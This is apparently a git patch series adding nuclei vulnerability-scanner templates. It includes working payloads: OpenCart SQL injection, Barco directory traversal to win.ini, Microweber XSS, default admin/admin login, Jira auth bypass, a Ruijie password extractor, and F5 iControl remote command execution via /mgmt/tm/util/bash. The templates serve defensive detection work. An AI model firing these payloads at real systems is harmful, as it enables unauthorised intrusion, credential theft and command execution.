From f92df928863a77044cd2d996f8cf4d2582560e2b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 4 May 2022 01:38:00 +0530 Subject: [PATCH 001/115] Create CVE-2018-11231.yaml --- cves/2018/CVE-2018-11231.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2018/CVE-2018-11231.yaml diff --git a/cves/2018/CVE-2018-11231.yaml b/cves/2018/CVE-2018-11231.yaml new file mode 100644 index 0000000000..304ddb2a62 --- /dev/null +++ b/cves/2018/CVE-2018-11231.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-11231 + +info: + name: Opencart Sqli + author: ritikchaddha + severity: high + reference: + - http://foreversong.cn/archives/1183 + tags: opencart,sqli,cve,cve2018 + +requests: + - raw: + - | + POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 + Host: {{Hostname}} + + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2} + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body + + - type: status + status: + - 200 From 89373ba3c8ef05b5b03e32f85370171418ad4d19 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 4 May 2022 17:54:41 +0530 Subject: [PATCH 002/115] Create telecom-gateway-default-login.yaml --- .../others/telecom-gateway-default-login.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 default-logins/others/telecom-gateway-default-login.yaml diff --git a/default-logins/others/telecom-gateway-default-login.yaml b/default-logins/others/telecom-gateway-default-login.yaml new file mode 100644 index 0000000000..f34b6bbd21 --- /dev/null +++ b/default-logins/others/telecom-gateway-default-login.yaml @@ -0,0 +1,35 @@ +id: telecom-gateway-default-password + +info: + name: Telecom Gateway Default Login + author: ritikchaddha + severity: high + tags: telecom,default-login,gateway + +requests: + - raw: + - | + GET /manager/index.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /manager/login.php HTTP/1.1 + Host: {{Hostname}} + + Name=admin&Pass=admin + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + words: + - "电信网关服务器管理后台" + - "index-shang.php" + - "di.php" + part: body + + - type: status + status: + - 200 From 67b4c3b0aa83af5b02b4729a00786e78a65135d7 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Thu, 5 May 2022 10:55:44 +0900 Subject: [PATCH 003/115] Create CVE-2022-26233.yaml --- CVE-2022-26233.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 CVE-2022-26233.yaml diff --git a/CVE-2022-26233.yaml b/CVE-2022-26233.yaml new file mode 100644 index 0000000000..05f00cd433 --- /dev/null +++ b/CVE-2022-26233.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-26233 + +info: + name: Barco Control Room Management Suite - Directory Traversal + author: 0x_Akoko + severity: high + description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + reference: + - https://0day.today/exploit/37579 + - https://www.cvedetails.com/cve/CVE-2022-26233 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-26233 + cwe-id: CWE-22 + tags: cve,cve2022,barco,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\windows\win.ini' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and From 276060c66b5480b31665e69c818439284d93188e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 6 May 2022 15:19:17 +0530 Subject: [PATCH 004/115] Create CVE-2022-0540.yaml (#4309) * Create CVE-2022-0288.yaml * misc updates * Create CVE-2022-0540.yaml * Update CVE-2022-0540.yaml * misc updates Co-authored-by: sandeep Co-authored-by: Prince Chaddha --- cves/2022/CVE-2022-0288.yaml | 2 +- cves/2022/CVE-2022-0540.yaml | 31 +++++++++++++++++++++++++++++++ 2 files changed, 32 insertions(+), 1 deletion(-) create mode 100644 cves/2022/CVE-2022-0540.yaml diff --git a/cves/2022/CVE-2022-0288.yaml b/cves/2022/CVE-2022-0288.yaml index 5165a8353c..848b9817c8 100644 --- a/cves/2022/CVE-2022-0288.yaml +++ b/cves/2022/CVE-2022-0288.yaml @@ -8,12 +8,12 @@ info: remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 - tags: cve,cve2022,wordpress,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2022-0288 cwe-id: CWE-79 + tags: cve,cve2022,wordpress,xss requests: - method: POST diff --git a/cves/2022/CVE-2022-0540.yaml b/cves/2022/CVE-2022-0540.yaml new file mode 100644 index 0000000000..434ceb2ec5 --- /dev/null +++ b/cves/2022/CVE-2022-0540.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-0540 + +info: + name: Atlassian Jira - Authentication bypass in Seraph + author: DhiyaneshDK + severity: high + description: | + A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + reference: + - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 + - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 + metadata: + shodan-query: http.component:"Atlassian Jira" + tags: cve,cve2022,atlassian,jira,exposure,auth-bypass + +requests: + - method: GET + path: + - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'General Insight Configuration' + + - type: status + status: + - 200 From ad5687b10522e8a318a32eee36c3665ccdfe4d24 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 6 May 2022 09:49:38 +0000 Subject: [PATCH 005/115] Auto Generated New Template Addition List [Fri May 6 09:49:38 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d99dbc3235..17902a17ba 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ cves/2022/CVE-2022-0165.yaml cves/2022/CVE-2022-0201.yaml cves/2022/CVE-2022-0288.yaml cves/2022/CVE-2022-0422.yaml +cves/2022/CVE-2022-0540.yaml cves/2022/CVE-2022-0543.yaml cves/2022/CVE-2022-0591.yaml cves/2022/CVE-2022-26352.yaml From cd3f64e0f55395809b68c8ca98a55ff2259cd196 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 6 May 2022 05:56:54 -0400 Subject: [PATCH 006/115] Create CVE-2022-1504 (#4308) * Create CVE-2022-1504.yaml * Added CVE-2022-1439 * removed additional template Co-authored-by: sandeep --- cves/2022/CVE-2022-1439.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2022/CVE-2022-1439.yaml diff --git a/cves/2022/CVE-2022-1439.yaml b/cves/2022/CVE-2022-1439.yaml new file mode 100644 index 0000000000..25667b9d92 --- /dev/null +++ b/cves/2022/CVE-2022-1439.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-1439 + +info: + name: Microweber Reflected Cross-Site Scripting + author: pikpikcu + severity: medium + description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-1439 + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ + classification: + cve-id: CVE-2022-1439 + metadata: + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "
Date: Fri, 6 May 2022 09:57:11 +0000 Subject: [PATCH 007/115] Auto Generated New Template Addition List [Fri May 6 09:57:11 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 17902a17ba..51edf454b4 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ cves/2022/CVE-2022-0422.yaml cves/2022/CVE-2022-0540.yaml cves/2022/CVE-2022-0543.yaml cves/2022/CVE-2022-0591.yaml +cves/2022/CVE-2022-1439.yaml cves/2022/CVE-2022-26352.yaml cves/2022/CVE-2022-26564.yaml exposed-panels/cyberoam-ssl-vpn-panel.yaml From 50f3acc6d30c57dcb0f8240b1fc030bd2847c7f4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 6 May 2022 09:57:16 +0000 Subject: [PATCH 008/115] Auto Generated CVE annotations [Fri May 6 09:57:16 UTC 2022] :robot: --- cves/2022/CVE-2022-0540.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0540.yaml b/cves/2022/CVE-2022-0540.yaml index 434ceb2ec5..29a7bf8fa1 100644 --- a/cves/2022/CVE-2022-0540.yaml +++ b/cves/2022/CVE-2022-0540.yaml @@ -3,7 +3,7 @@ id: CVE-2022-0540 info: name: Atlassian Jira - Authentication bypass in Seraph author: DhiyaneshDK - severity: high + severity: critical description: | A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. reference: @@ -13,6 +13,11 @@ info: metadata: shodan-query: http.component:"Atlassian Jira" tags: cve,cve2022,atlassian,jira,exposure,auth-bypass + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-0540 + cwe-id: CWE-287 requests: - method: GET From 48bdaf98cf3ba757f23a253299b6a05b49261510 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 6 May 2022 17:11:26 +0700 Subject: [PATCH 009/115] Update nginx-version.yaml --- technologies/nginx/nginx-version.yaml | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/technologies/nginx/nginx-version.yaml b/technologies/nginx/nginx-version.yaml index 4d133e1d80..622d6c6aca 100644 --- a/technologies/nginx/nginx-version.yaml +++ b/technologies/nginx/nginx-version.yaml @@ -1,8 +1,8 @@ id: nginx-version info: - name: nginx version detect - author: philippedelteil + name: Nginx version detect + author: philippedelteil,daffainfo severity: info description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. tags: tech,nginx @@ -11,20 +11,21 @@ requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - - type: regex part: header regex: - - "nginx+" + - "nginx\\[0-9.]+" - type: status status: - 200 extractors: - - type: kval + - type: regex part: header - kval: - - Server + group: 1 + regex: + - "nginx\\([0-9.]+)" From 3b6ba6f9a619246710b8efdea0d2b03707c1fdf8 Mon Sep 17 00:00:00 2001 From: "Mr. Cl0wn - H4ck1ng C0d3r" Date: Fri, 6 May 2022 07:24:34 -0300 Subject: [PATCH 010/115] F5 BIG-IP iControl REST Panel (#4303) * CVE-2022-1388 / BIG-IP iControl REST vulnerability * Update CVE-2022-1388.yml Validate with status code status: - 401 * renamed template Co-authored-by: sandeep --- exposed-panels/bigip-rest-panel.yaml | 31 ++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/bigip-rest-panel.yaml diff --git a/exposed-panels/bigip-rest-panel.yaml b/exposed-panels/bigip-rest-panel.yaml new file mode 100644 index 0000000000..c98cb9e567 --- /dev/null +++ b/exposed-panels/bigip-rest-panel.yaml @@ -0,0 +1,31 @@ +id: bigip-icontrol-rest + +info: + name: F5 BIG-IP iControl REST Panel + author: MrCl0wnLab + severity: info + description: | + Undisclosed requests may bypass iControl REST authentication. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-1388 + - https://support.f5.com/csp/article/K23605346 + - https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html + metadata: + shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + tags: panel,bigip,f5 + +requests: + - method: GET + path: + - "{{BaseURL}}/mgmt/shared/authn/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "resterrorresponse" + + - type: status + status: + - 401 From 985b05165c309c999af2fa4dfc6e2dfce0b72fc0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 6 May 2022 10:24:53 +0000 Subject: [PATCH 011/115] Auto Generated New Template Addition List [Fri May 6 10:24:53 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 51edf454b4..68b80585ce 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ cves/2022/CVE-2022-0591.yaml cves/2022/CVE-2022-1439.yaml cves/2022/CVE-2022-26352.yaml cves/2022/CVE-2022-26564.yaml +exposed-panels/bigip-rest-panel.yaml exposed-panels/cyberoam-ssl-vpn-panel.yaml exposed-panels/oracle-containers-panel.yaml exposed-panels/oracle-enterprise-manager-login.yaml From 1fdb124853682787f7523f708a09c8eca31f47e9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 6 May 2022 15:55:50 +0530 Subject: [PATCH 012/115] fixed line break between header and body --- cves/2021/CVE-2021-22986.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml index 89a47a6628..538a1c7ff0 100644 --- a/cves/2021/CVE-2021-22986.yaml +++ b/cves/2021/CVE-2021-22986.yaml @@ -24,7 +24,7 @@ requests: Authorization: Basic YWRtaW46 Content-Type: application/json Cookie: BIGIPAuthCookie=1234 - Connection: close + {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}} - | POST /mgmt/tm/util/bash HTTP/1.1 @@ -32,8 +32,9 @@ requests: Accept-Language: en X-F5-Auth-Token: {{token}} Content-Type: application/json - Connection: close + {"command":"run","utilCmdArgs":"-c id"} + extractors: - type: regex part: body @@ -42,6 +43,7 @@ requests: group: 1 regex: - "([A-Z0-9]{26})" + - type: regex part: body group: 1 From 7ffa667acc72ed0c701ed6024b5469a51adbce0b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 6 May 2022 16:10:24 +0530 Subject: [PATCH 014/115] Create firewall-password-leak.yaml --- .../other/firewall-password-leak.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/firewall-password-leak.yaml diff --git a/vulnerabilities/other/firewall-password-leak.yaml b/vulnerabilities/other/firewall-password-leak.yaml new file mode 100644 index 0000000000..678125cbec --- /dev/null +++ b/vulnerabilities/other/firewall-password-leak.yaml @@ -0,0 +1,25 @@ +id: firewall-password-leak + +info: + name: Firewalls Password Leak + author: ritikchaddha + severity: high + description: Security Notice of Information Disclosure Vulnerability in Multiple Firewall Devices + reference: + - https://forum.butian.net/share/177 + tags: password,leak,firewall + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + words: + - "var dkey_verify = Get_Verify_Info(hex_md5" + - "get_dkey_passwd" + - ""\"name\":\"\\w+\",\"password\":\"\\w{15,33}\",\"lastpwdtime" + part: body From 684528467bb4aa677dba483e8d67ea6948f033e7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 6 May 2022 16:13:47 +0530 Subject: [PATCH 015/115] Update firewall-password-leak.yaml --- vulnerabilities/other/firewall-password-leak.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/firewall-password-leak.yaml b/vulnerabilities/other/firewall-password-leak.yaml index 678125cbec..a6b621d2f1 100644 --- a/vulnerabilities/other/firewall-password-leak.yaml +++ b/vulnerabilities/other/firewall-password-leak.yaml @@ -21,5 +21,5 @@ requests: words: - "var dkey_verify = Get_Verify_Info(hex_md5" - "get_dkey_passwd" - - ""\"name\":\"\\w+\",\"password\":\"\\w{15,33}\",\"lastpwdtime" + - "\"name\":\"\\w+\",\"password\":\"\\w{15,33}\",\"lastpwdtime" part: body From d6ba7f57baeb49fcf21bba9f55f0198170a8d98f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com> Date: Fri, 6 May 2022 22:57:40 +0800 Subject: [PATCH 016/115] Create CVE-2022-1040.yaml --- cves/2022/CVE-2022-1040.yaml | 40 ++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2022/CVE-2022-1040.yaml diff --git a/cves/2022/CVE-2022-1040.yaml b/cves/2022/CVE-2022-1040.yaml new file mode 100644 index 0000000000..ee1749ae17 --- /dev/null +++ b/cves/2022/CVE-2022-1040.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-1040 + +info: + name: Sophos Firewall RCE + author: For3stCo1d + severity: critical + description: An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 + - https://github.com/killvxk/CVE-2022-1040 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 9.8 + cve-id: CVE-2022-1040 + cwe-id: CWE-287 + tags: cve,cve2022,sophos,firewall + +requests: + - method: POST + path: + - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" + headers: + X-Requested-With: "XMLHttpRequest" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{\"status\":400}" + + - type: word + part: header + words: + - "Server: xxxx" + + - type: status + status: + - 200 + From e445aa053a4a999e7e7ed9de3c08b2edd9fbc0d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 20:59:15 +0530 Subject: [PATCH 017/115] Update and rename firewall-password-leak.yaml to ruijie-password-leak.yaml --- ...rd-leak.yaml => ruijie-password-leak.yaml} | 24 ++++++++++++++----- 1 file changed, 18 insertions(+), 6 deletions(-) rename vulnerabilities/other/{firewall-password-leak.yaml => ruijie-password-leak.yaml} (50%) diff --git a/vulnerabilities/other/firewall-password-leak.yaml b/vulnerabilities/other/ruijie-password-leak.yaml similarity index 50% rename from vulnerabilities/other/firewall-password-leak.yaml rename to vulnerabilities/other/ruijie-password-leak.yaml index a6b621d2f1..ccf02a0fe3 100644 --- a/vulnerabilities/other/firewall-password-leak.yaml +++ b/vulnerabilities/other/ruijie-password-leak.yaml @@ -1,25 +1,37 @@ -id: firewall-password-leak +id: ruijie-password-leak info: - name: Firewalls Password Leak + name: RG-UAC Ruijie Password Leak author: ritikchaddha severity: high description: Security Notice of Information Disclosure Vulnerability in Multiple Firewall Devices reference: - https://forum.butian.net/share/177 - tags: password,leak,firewall + metadata: + shodan-query: http.html:"Get_Verify_Info" + tags: password,leak,ruijie,exposure,firewall,router requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: - - type: word + part: body words: - "var dkey_verify = Get_Verify_Info(hex_md5" - "get_dkey_passwd" - - "\"name\":\"\\w+\",\"password\":\"\\w{15,33}\",\"lastpwdtime" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex part: body + group: 1 + regex: + - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);' From 359b17102bfccab107cd960e4b161c28d7cf89c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 6 May 2022 15:32:36 +0000 Subject: [PATCH 018/115] Auto Generated New Template Addition List [Fri May 6 15:32:36 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 68b80585ce..39eea00add 100644 --- a/.new-additions +++ b/.new-additions @@ -21,4 +21,5 @@ exposed-panels/xoops/xoops-installation-wizard.yaml exposed-panels/zoneminder-login.yaml exposures/files/desktop-ini-exposure.yaml technologies/sucuri-firewall.yaml +vulnerabilities/other/ruijie-password-leak.yaml vulnerabilities/wordpress/health-check-lfi.yaml From 610f52a09be6f0bce51278eb4f9e9bca6c91a26c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:07:45 +0530 Subject: [PATCH 019/115] Update and rename vulnerabilities/other/ruijie-password-leak.yaml to vulnerabilities/other/ruijie/ruijie-password-leak.yaml --- .../other/{ => ruijie}/ruijie-password-leak.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) rename vulnerabilities/other/{ => ruijie}/ruijie-password-leak.yaml (80%) diff --git a/vulnerabilities/other/ruijie-password-leak.yaml b/vulnerabilities/other/ruijie/ruijie-password-leak.yaml similarity index 80% rename from vulnerabilities/other/ruijie-password-leak.yaml rename to vulnerabilities/other/ruijie/ruijie-password-leak.yaml index ccf02a0fe3..f281f1862a 100644 --- a/vulnerabilities/other/ruijie-password-leak.yaml +++ b/vulnerabilities/other/ruijie/ruijie-password-leak.yaml @@ -18,12 +18,9 @@ requests: matchers-condition: and matchers: - - type: word - part: body - words: - - "var dkey_verify = Get_Verify_Info(hex_md5" - - "get_dkey_passwd" - condition: and + - type: regex + regex: + - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);' - type: status status: From 16c82b3aad79128a73931dcb1b7396262a91302d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:09:07 +0530 Subject: [PATCH 020/115] Rename vulnerabilities/other/ruijie/ruijie-password-leak.yaml to vulnerabilities/ruijie/ruijie-password-leak.yaml --- vulnerabilities/{other => }/ruijie/ruijie-password-leak.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/{other => }/ruijie/ruijie-password-leak.yaml (100%) diff --git a/vulnerabilities/other/ruijie/ruijie-password-leak.yaml b/vulnerabilities/ruijie/ruijie-password-leak.yaml similarity index 100% rename from vulnerabilities/other/ruijie/ruijie-password-leak.yaml rename to vulnerabilities/ruijie/ruijie-password-leak.yaml From 027c4ee86e88c83296ef0bdc3fe492b4e50e78ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:09:20 +0530 Subject: [PATCH 021/115] Rename vulnerabilities/other/ruijie-eg-rce.yaml to vulnerabilities/ruijie/ruijie-eg-rce.yaml --- vulnerabilities/{other => ruijie}/ruijie-eg-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/{other => ruijie}/ruijie-eg-rce.yaml (97%) diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/ruijie/ruijie-eg-rce.yaml similarity index 97% rename from vulnerabilities/other/ruijie-eg-rce.yaml rename to vulnerabilities/ruijie/ruijie-eg-rce.yaml index cb7f4e5a96..236a2e9889 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/ruijie/ruijie-eg-rce.yaml @@ -53,4 +53,4 @@ requests: group: 1 internal: true regex: - - 'admin ([a-zA-Z0-9#@]+)",' \ No newline at end of file + - 'admin ([a-zA-Z0-9#@]+)",' From ef7e1fcf8b57c5ce15cb95168eb16351faf841df Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:09:32 +0530 Subject: [PATCH 022/115] Rename vulnerabilities/other/ruijie-networks-lfi.yaml to vulnerabilities/ruijie/ruijie-networks-lfi.yaml --- vulnerabilities/{other => ruijie}/ruijie-networks-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/{other => ruijie}/ruijie-networks-lfi.yaml (100%) diff --git a/vulnerabilities/other/ruijie-networks-lfi.yaml b/vulnerabilities/ruijie/ruijie-networks-lfi.yaml similarity index 100% rename from vulnerabilities/other/ruijie-networks-lfi.yaml rename to vulnerabilities/ruijie/ruijie-networks-lfi.yaml From 303165dac423de973f7aab69258ca076775e9e27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:09:42 +0530 Subject: [PATCH 023/115] Rename vulnerabilities/other/ruijie-networks-rce.yaml to vulnerabilities/ruijie/ruijie-networks-rce.yaml --- vulnerabilities/{other => ruijie}/ruijie-networks-rce.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/{other => ruijie}/ruijie-networks-rce.yaml (100%) diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml similarity index 100% rename from vulnerabilities/other/ruijie-networks-rce.yaml rename to vulnerabilities/ruijie/ruijie-networks-rce.yaml From 16fb30a0f64398e3975fe94baf0f01df683c6516 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:13:34 +0530 Subject: [PATCH 024/115] Create rg-uac-panel.yaml --- exposed-panels/ruijie/rg-uac-panel.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/ruijie/rg-uac-panel.yaml diff --git a/exposed-panels/ruijie/rg-uac-panel.yaml b/exposed-panels/ruijie/rg-uac-panel.yaml new file mode 100644 index 0000000000..9894266b73 --- /dev/null +++ b/exposed-panels/ruijie/rg-uac-panel.yaml @@ -0,0 +1,28 @@ +id: rg-uac-panel + +info: + name: RG-UAC Ruijie Login Panel + author: princechaddha + severity: info + metadata: + shodan-query: http.html:"Get_Verify_Info" + tags: panel,ruijie,router,firewall + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Ruijie Internet access management and audit system" + - "get_dkey_passwd" + condition: and + + - type: status + status: + - 200 From ed276aa8cb7384fe73473580e1f19637902fa134 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:30:37 +0530 Subject: [PATCH 025/115] Update rg-uac-panel.yaml --- exposed-panels/ruijie/rg-uac-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/ruijie/rg-uac-panel.yaml b/exposed-panels/ruijie/rg-uac-panel.yaml index 9894266b73..e7a5ecfa7c 100644 --- a/exposed-panels/ruijie/rg-uac-panel.yaml +++ b/exposed-panels/ruijie/rg-uac-panel.yaml @@ -15,11 +15,10 @@ requests: matchers-condition: and matchers: - - type: word part: body words: - - "Ruijie Internet access management and audit system" + - "dkey_check.php" - "get_dkey_passwd" condition: and From 0489bfc0cf2cb34f993a6de27db596a24a78ea4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 6 May 2022 16:07:36 +0000 Subject: [PATCH 026/115] Auto Generated New Template Addition List [Fri May 6 16:07:36 UTC 2022] :robot: --- .new-additions | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index 39eea00add..3842c55ff0 100644 --- a/.new-additions +++ b/.new-additions @@ -16,10 +16,11 @@ exposed-panels/bigip-rest-panel.yaml exposed-panels/cyberoam-ssl-vpn-panel.yaml exposed-panels/oracle-containers-panel.yaml exposed-panels/oracle-enterprise-manager-login.yaml +exposed-panels/ruijie/rg-uac-panel.yaml exposed-panels/supermicro-bmc-panel.yaml exposed-panels/xoops/xoops-installation-wizard.yaml exposed-panels/zoneminder-login.yaml exposures/files/desktop-ini-exposure.yaml technologies/sucuri-firewall.yaml -vulnerabilities/other/ruijie-password-leak.yaml +vulnerabilities/ruijie/ruijie-password-leak.yaml vulnerabilities/wordpress/health-check-lfi.yaml From 4f75a44ef2c2866f3ff414870363255fc722d47b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 6 May 2022 21:47:16 +0530 Subject: [PATCH 027/115] Update CVE-2022-1040.yaml --- cves/2022/CVE-2022-1040.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-1040.yaml b/cves/2022/CVE-2022-1040.yaml index ee1749ae17..9f011e4d50 100644 --- a/cves/2022/CVE-2022-1040.yaml +++ b/cves/2022/CVE-2022-1040.yaml @@ -6,8 +6,8 @@ info: severity: critical description: An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 - https://github.com/killvxk/CVE-2022-1040 + - 